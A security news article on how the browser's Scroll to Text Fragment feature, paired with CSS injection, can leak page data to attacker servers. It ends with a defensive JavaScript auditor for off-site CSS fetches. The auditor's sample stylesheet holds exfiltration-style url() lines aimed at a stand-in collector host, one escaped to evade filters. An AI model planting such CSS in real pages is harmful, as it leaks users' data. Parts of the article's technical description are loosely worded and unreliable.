Research says threat actors could exploit the Scroll to Text Fragment (STTF) feature in web browsers to steal users’ sensitive data. This feature lets users create links that point to a specific portion of a webpage by adding the ‘#:~:text’ identifier to the URL.
According to studies of the STTF issue, attackers use CSS selectors to collect specific information from the targeted webpage and then forward it to their C2 servers. If a webpage has a CSS injection vulnerability, the attackers could manipulate its style specifications so that the browser sends exfiltrated data to a malicious server, based on the STTF feature’s attributes.
This is not a flaw in the feature itself; rather, Scroll to Text Fragment is abused with malicious intent.
The researchers state that despite the security protocols designed for the Scroll to Text Fragment (STTF) feature, attackers could find ways to circumvent them and steal data from a victim’s webpage.
For instance, the threat actors could send a unique URL that reveals to their C2 servers whether their target is an administrator. These attackers could also collect data from the site that a target is currently using in their web browser.
If a victim lacks cybersecurity awareness, threat actors could easily lure them through social engineering tactics, which lets the attackers abuse the STTF feature and steal the victim’s data. To abuse STTF, the attackers must also exploit the victim’s web browser extensions to copy user clicks, since this is required for the STTF feature to work.
In addition, according to a sample PoC that the researchers have shared, the STTF attack scheme could reveal the recovery seed phrase of a victim’s cryptocurrency wallet.
The feature gives attackers an advantage in two situations: when they find a flaw on a website and need to target an administrator among all other unknown users, and when they know who their target is and seek any information they need about that victim.
Properly executed social engineering tactics allow attackers to abuse the Scroll to Text Fragment feature by luring their targets into visiting a compromised webpage. Hence, developers are warned that web browser features such as STTF could also pose risks to users. CSS injection bugs could compromise users’ security.
As usual, users must avoid clicking on suspicious links and keep their software updated to patch flaws that threat actors could abuse.
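For developers, one way to audit user-supplied or third-party CSS for the outbound requests that CSS-injection exfiltration depends on. This is an added example, not code from the researchers; the site origin, host allowlist and sample stylesheet are constructed assumptions.

```javascript
// Audit untrusted CSS for declarations that make the browser fetch from a
// host outside an allowlist. SITE_ORIGIN and ALLOWED_HOSTS are assumptions.
const SITE_ORIGIN = "https://app.example";
const ALLOWED_HOSTS = new Set(["app.example", "static.app.example"]);

// Constructed sample: a theme stylesheet submitted by a user.
const SAMPLE_CSS = `
/* constructed sample input */
.avatar { background: url("/img/default.png"); }
.banner { background-image: url(//collector.invalid/hit?field=role); }
@import 'https://static.app.example/theme.css';
.badge::before { content: \\75rl(https://collector.invalid/b); }
.icon { background: url(data:image/gif;base64,R0lGODlhAQABAAAAACw=); }
`;

// Resolve CSS backslash escapes so an escaped "url" or host cannot slip past.
function unescapeCss(s) {
  return s.replace(/\\([0-9a-fA-F]{1,6})\s?|\\(.)/g, (_, hex, ch) => {
    if (!hex) return ch;
    const cp = parseInt(hex, 16);
    return cp > 0x10ffff ? "\uFFFD" : String.fromCodePoint(cp);
  });
}

// Return one finding per url(...) or @import target that leaves the allowlist.
function findOffsiteFetches(cssText) {
  const css = unescapeCss(cssText.replace(/\/\*[\s\S]*?\*\//g, ""));
  const pattern = /url\(\s*(["']?)(.*?)\1\s*\)|@import\s+(["'])(.*?)\3/gi;
  const findings = [];
  for (const m of css.matchAll(pattern)) {
    const raw = (m[2] ?? m[4]).trim();
    if (raw === "" || /^data:/i.test(raw)) continue; // inline data, no request
    let target;
    try {
      target = new URL(raw, SITE_ORIGIN); // handles relative and //host forms
    } catch {
      findings.push({ raw, host: null, reason: "unparseable URL" });
      continue;
    }
    if (!ALLOWED_HOSTS.has(target.hostname)) {
      findings.push({ raw, host: target.hostname, reason: "off-allowlist host" });
    }
  }
  return findings;
}

console.log(findOffsiteFetches(SAMPLE_CSS));
```

A check like this belongs wherever the application accepts or stores style rules from users; it complements, and does not replace, fixing the injection point itself.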